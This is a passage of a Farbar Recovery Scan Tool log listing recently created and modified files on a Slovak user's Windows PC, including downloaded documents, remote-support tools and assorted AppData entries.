2021-03-29 13:06 - 2021-03-29 13:06 - 002298368 _____ (Farbar) C:\Users\Alžbeta\Downloads\FRST64.exe
2021-03-29 13:01 - 2021-03-29 13:03 - 000000000 ____D C:\Users\Alžbeta\AppData\Roaming\AnyDesk
2021-03-29 13:00 - 2021-03-29 13:01 - 003189712 _____ (philandro Software GmbH) C:\Users\Alžbeta\Downloads\support.exe
2021-03-29 11:22 - 2021-03-29 11:22 - 000063794 _____ C:\Users\Alžbeta\Downloads\životopis,final.pdf
2021-03-29 11:05 - 2021-03-29 11:05 - 000732744 _____ C:\Users\Alžbeta\Downloads\Maruška a Betka.xlsx
2021-03-26 15:47 - 2021-03-26 15:48 - 000243932 _____ C:\Users\Alžbeta\Downloads\kvartalny-vykaz-1-2020-obaly (1).pdf
2021-03-26 12:32 - 2021-03-26 12:32 - 000248574 _____ C:\Users\Alžbeta\Downloads\kvartalny-vykaz-1-2021-obaly (2).pdf
2021-03-26 12:31 - 2021-03-26 12:31 - 000244842 _____ C:\Users\Alžbeta\Downloads\kvartalny-vykaz-1-2021-obaly (1).pdf
2021-03-24 12:09 - 2021-03-24 12:09 - 000063787 _____ C:\Users\Alžbeta\Downloads\životopis, aktual.pdf
2021-03-22 13:07 - 2021-03-22 13:07 - 000013571 _____ C:\Users\Alžbeta\Downloads\vratene adresy emailuve k hromadnemu mailu.xlsx
2021-03-18 20:20 - 2021-03-18 20:20 - 000000000 ____D C:\Users\Alžbeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Zoom
2021-03-18 20:19 - 2021-03-18 20:20 - 000000000 ____D C:\Users\Alžbeta\AppData\Roaming\Zoom
2021-03-18 11:10 - 2021-03-18 11:10 - 000895266 _____ C:\Users\Alžbeta\Downloads\Guidance - EEE, BaA 2021.pdf
2021-03-18 11:10 - 2021-03-18 11:10 - 000820778 _____ C:\Users\Alžbeta\Downloads\Guidance - PACKAGING 2021.pdf
2021-03-18 11:10 - 2021-03-18 11:10 - 000677513 _____ C:\Users\Alžbeta\Downloads\Guidance - NON-PACKAGING PRODUCTS 2021.pdf
2021-03-18 11:02 - 2021-03-26 13:59 - 000009595 _____ C:\Users\Alžbeta\Desktop\plán zaúčania.xlsx
2021-03-16 15:05 - 2021-03-16 15:05 - 000248801 _____ C:\Users\Alžbeta\Downloads\kvartalny-vykaz-1-2021-obaly.pdf
2021-03-16 14:53 - 2021-03-16 14:53 - 000243856 _____ C:\Users\Alžbeta\Downloads\kvartalny-vykaz-1-2020-obaly.pdf
2021-03-16 13:47 - 2021-03-16 13:47 - 001941834 _____ C:\Users\Alžbeta\Downloads\zmluvy (2).zip
2021-03-15 12:03 - 2021-03-15 12:04 - 000002333 _____ C:\Users\Alžbeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive for Business.lnk
2021-03-12 21:02 - 2021-02-13 04:26 - 002132992 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2021-03-12 21:02 - 2021-02-13 04:12 - 002058752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2021-03-12 21:00 - 2021-02-13 04:24 - 000073728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2021-03-12 20:59 - 2021-02-13 04:47 - 000088064 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2021-03-12 20:51 - 2021-03-12 20:51 - 000009810 _____ C:\Users\Alžbeta\Downloads\ing ed.xlsx
2021-03-12 20:51 - 2021-03-12 20:51 - 000009810 _____ C:\Users\Alžbeta\Downloads\ing ed (1).xlsx
2021-03-12 11:02 - 2021-03-12 11:02 - 004163132 _____ C:\Users\Alžbeta\Downloads\Zmluva o spolupráci.pdf
2021-03-12 11:02 - 2021-03-12 11:02 - 000620705 _____ C:\Users\Alžbeta\Downloads\zplnomocneni.pdf
2021-03-09 13:05 - 2021-03-09 13:05 - 000251496 _____ C:\Users\Alžbeta\Downloads\0348_210309120104_001.pdf
2021-03-08 13:05 - 2021-03-08 13:05 - 008413907 _____ C:\Users\Alžbeta\Downloads\nove zmluvy.zip
2021-03-01 14:47 - 2021-03-01 14:47 - 000629229 _____ C:\Users\Alžbeta\Downloads\doc02092520210301124246.pdf
2021-03-01 11:37 - 2021-03-01 11:38 - 000120950 _____ C:\Users\Alžbeta\Downloads\V_1482812005_2_20210226_C1_P0.pdf

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-03-29 13:01 - 2019-01-09 23:07 - 000000000 ____D C:\Users\Alžbeta\Documents\Súbory Outlooku
2021-03-29 12:29 - 2016-11-09 21:31 - 002444288 ___SH C:\Users\Alžbeta\Downloads\Thumbs.db
2021-03-29 12:22 - 2016-11-09 16:23 - 000000000 ____D C:\Users\Alžbeta\AppData\Local\CrashDumps
2021-03-29 11:56 - 2016-11-18 16:44 - 006104576 ___SH C:\Users\Alžbeta\Desktop\Thumbs.db
2021-03-29 11:54 - 2016-11-09 16:07 - 000000000 ____D C:\Users\Alžbeta\AppData\Local\Packages
2021-03-29 09:59 - 2016-11-09 16:04 - 000000000 ____D C:\Users\Alžbeta\AppData\Local\SweetLabs App Platform
2021-03-29 09:57 - 2016-11-09 16:21 - 000003974 _____ C:\Windows\system32\Tasks\User_Feed_Synchronization-{2D25E5BB-08D3-4A55-9814-E736B113F726}
2021-03-29 09:53 - 2016-11-09 16:15 - 000000000 ___RD C:\Users\Alžbeta\OneDrive
2021-03-28 16:58 - 2020-10-02 21:18 - 000000000 ____D C:\Users\Alžbeta\Desktop\Diplomovka
2021-03-28 12:13 - 2017-06-27 16:58 - 000017082 _____ C:\Windows\system32\perfh01B.dat
2021-03-28 12:13 - 2017-06-27 16:58 - 000006132 _____ C:\Windows\system32\perfc01B.dat
2021-03-28 12:13 - 2014-03-18 12:03 - 000870760 _____ C:\Windows\system32\PerfStringBackup.INI
2021-03-28 12:13 - 2013-08-22 15:36 - 000000000 ____D C:\Windows\Inf
2021-03-24 20:33 - 2016-11-27 16:33 - 000000000 ____D C:\Users\Alžbeta\AppData\LocalLow\Mozilla
2021-03-24 14:08 - 2019-03-13 19:29 - 000000000 ____D C:\ProgramData\Mozilla
2021-03-24 13:34 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\rescache
2021-03-23 14:04 - 2020-09-17 09:27 - 000000000 ____D C:\Users\Alžbeta\Desktop\BETKA-najnovšia verzia
2021-03-22 13:05 - 2018-05-22 10:32 - 000000000 ____D C:\MailServer
2021-03-20 16:06 - 2016-11-09 16:13 - 000003596 _____ C:\Windows\system32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2055909378-1137603550-79369489-1001
2021-03-18 15:38 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\AppReadiness
2021-03-18 10:33 - 2017-12-30 23:57 - 000002260 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-03-18 10:33 - 2017-12-30 23:57 - 000002219 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-03-18 10:33 - 2017-12-30 23:57 - 000002219 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2021-03-15 19:56 - 2020-12-01 22:03 - 000004080 _____ C:\Windows\system32\Tasks\Opera scheduled Autoupdate 1513103063
2021-03-15 19:56 - 2020-05-15 15:02 - 000001449 _____ C:\Users\Alžbeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Prehliadač Opera.lnk
2021-03-15 19:21 - 2020-03-26 10:48 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2021-03-15 19:21 - 2013-08-22 16:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2021-03-15 19:21 - 2013-08-22 16:44 - 000491328 _____ C:\Windows\system32\FNTCACHE.DAT
2021-03-15 16:45 - 2013-08-22 15:25 - 000262144 ___SH C:\Windows\system32\config\BBI
2021-03-15 16:40 - 2013-08-22 17:36 - 000000000 ___RD C:\Windows\ToastData
2021-03-15 16:39 - 2017-03-05 18:15 - 000000000 ____D C:\Windows\system32\MRT
2021-03-15 16:39 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\SysWOW64\setup
2021-03-15 16:39 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\system32\setup
2021-03-15 16:13 - 2017-03-05 18:14 - 131005360 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2021-03-15 16:04 - 2020-12-18 10:00 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2021-03-15 12:14 - 2018-06-27 17:21 - 000003176 _____ C:\Windows\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2055909378-1137603550-79369489-1001
2021-03-15 11:26 - 2013-08-22 17:20 - 000000000 ____D C:\Windows\CbsTemp
2021-03-11 11:55 - 2020-11-02 11:15 - 000000000 ____D C:\Users\Alžbeta\Desktop\5. ročník
2021-03-10 14:07 - 2017-12-14 12:21 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013
2021-03-10 10:52 - 2013-08-22 15:25 - 000000199 _____ C:\Windows\win.ini

==================== Files in the root of some directories ========

2017-12-12 20:21 - 2017-12-12 21:16 - 000213112 _____ () C:\Users\Alžbeta\AppData\Roaming\DMGR_1N1I1F1S1T1I0M1F1Q2Y1I1P1B0C1F1Q1P.txt
2019-04-25 12:15 - 2020-03-21 17:43 - 000000038 _____ () C:\Users\Alžbeta\AppData\Roaming\WB.CFG
2019-03-02 21:36 - 2019-03-02 21:36 - 000000000 _____ () C:\Users\Alžbeta\AppData\Local\BIT4B2F.tmp
2017-12-31 01:18 - 2017-12-31 01:18 - 000000068 _____ () C:\Users\Alžbeta\AppData\Local\PLHDzBxzBx

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

